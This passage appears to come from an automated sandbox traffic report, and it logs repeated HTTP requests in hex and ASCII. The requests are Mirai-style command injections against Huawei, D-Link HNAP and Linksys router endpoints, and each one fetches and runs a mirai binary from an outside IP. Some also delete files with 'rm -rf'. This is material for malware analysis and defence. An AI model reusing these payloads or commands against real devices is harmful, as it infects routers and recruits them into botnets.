77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 